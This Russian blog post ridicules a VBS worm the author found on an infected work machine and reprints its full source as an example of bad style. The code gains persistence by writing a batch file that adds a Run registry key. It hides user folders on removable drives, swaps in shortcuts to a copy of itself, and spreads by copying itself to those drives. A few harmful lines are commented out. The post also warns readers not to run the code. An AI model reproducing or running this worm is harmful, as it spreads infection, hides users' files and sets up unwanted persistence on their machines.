Веб программирование

Программа червь на VBS (Образец дурного стиля)

 
 

Сразу оговорюсь: я никого не призываю к написанию вредоносных программ. Нижеприведённый код не мой, я нашёл его на одной из заражённых машин в нашей шаражке. Убогость стиля и полное отсутствие знаний у автора меня изрядно повеселило,{facepalm} решил поделиться с Вами, чтоб Вы тоже оценили {facepalm}{facepalm}{facepalm}{facepalm}{facepalm} Прошу считать данный код как плохой пример кодинга.

Данный свиток - программа червь, создающая свои копии на локальных и сменных носителях. Вредоносный функционал - червь скрывает пользовательские папки и подменяет их ярлыками. На данный момент свиток определяется всеми антивирусами и опасности не представляет. Потенциально опасные места закомментированы.

НЕ исполняйте этот код на своём компьютере.


Set WshShell = WScript.CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
If Chr(Asc(Wscript.ScriptFullName))+":" <> WshShell.ExpandEnvironmentStrings("%systemdrive%") Then 
Set c = fso.GetFile(Wscript.ScriptFullName)
c.Copy(WshShell.ExpandEnvironmentStrings("%systemdrive%") & "\Windows\WSH.vbs")
'c.Attributes = 2
'ухищрение, чтобы не вызвать паники антивирусов. Увы, это ничем не помогло бы, не стоило извращаться...{facepalm}
Set file1 = fso.CreateTextFile(WshShell.ExpandEnvironmentStrings("%systemdrive%") & "\Windows\reg.bat")
file1.WriteLine("REG Query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v wsh&& goto metka")
file1.WriteLine("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v wsh /t REG_SZ /d %systemdrive%\Windows\WSH.vbs")
file1.WriteLine(":metka")
file1.Close
WshShell.run WshShell.ExpandEnvironmentStrings("%systemdrive%") & "\Windows\reg.bat", 0

End If
Function R(per) ' данная процедура скрывает
Set f = fso.GetFolder(per & ":\")
For Each Folder In f.Subfolders
Set p = fso.GetFolder(Folder)
p.Attributes = 2
Set objShortCut = WshShell.CreateShortcut(per & ":\" & Folder.Name & ".lnk")
objShortCut.TargetPath = per & ":\77ab.vbs"
objShortCut.Description = Folder.Name
objShortCut.WindowStyle=7
objShortCut.IconLocation=WshShell.ExpandEnvironmentStrings("%systemdrive%") & "\Windows\system32\shell32.dll,4"
'objShortCut.Save
Next
If Wscript.ScriptFullName <> "" Then
Set f = fso.GetFile(Wscript.ScriptFullName)
f.Copy(per & ":\77ab.vbs")
'p.Attributes = 2
End If
End Function

do
If Chr(Asc(Wscript.ScriptFullName))+":" = WshShell.ExpandEnvironmentStrings("%systemdrive%") Then
'Как видим, свиток выбирает 1 доступный (локальный или сменный) диск и прекращает работу
Set Drives = FSO.Drives 
For Each Drive In Drives
    if ((Drive.DriveType = 1) and (Drive.DriveLetter <> "A") and (Drive.DriveLetter <> "B") and Drive.IsReady) then 
        Call R(Drive.DriveLetter)
        Exit Do {facepalm}
    end if
Next
End If
loop

Есть вопросы? Спроси на нашем форуме!!
Нет комментариев

Оставлять комментарии можно только зарегистрированным




Предупреждение: Вся информация представлена исключительно в образовательных целях.
Ни авторы, ни администрация не несут ответственности в случае ее использования в противозаконных целях.